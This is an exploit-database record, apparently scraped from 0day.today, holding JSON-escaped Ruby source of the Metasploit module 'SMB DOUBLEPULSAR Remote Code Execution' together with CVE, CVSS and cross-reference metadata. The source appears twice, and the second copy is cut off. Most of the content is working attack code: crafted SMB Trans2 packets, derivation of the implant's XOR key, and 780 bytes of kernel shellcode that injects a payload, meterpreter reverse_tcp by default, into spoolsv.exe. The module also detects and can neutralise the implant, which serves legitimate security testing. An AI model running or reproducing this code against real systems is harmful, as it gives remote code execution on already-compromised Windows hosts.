ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-17] #"}, "lastseen": "2021-09-16T22:30:47", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "1750b808c05248733308d2c3cf531be8", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant. The module does not exploit MS17-010 itself: its check sends a DOUBLEPULSAR ping over SMB and the exploit refuses to proceed unless the implant answers, and DefangedMode is on by default and must be disabled explicitly, because executing code against the implant may contaminate forensic evidence in an investigation.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-20T21:24:01", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-20T21:24:01", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T21:24:01", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
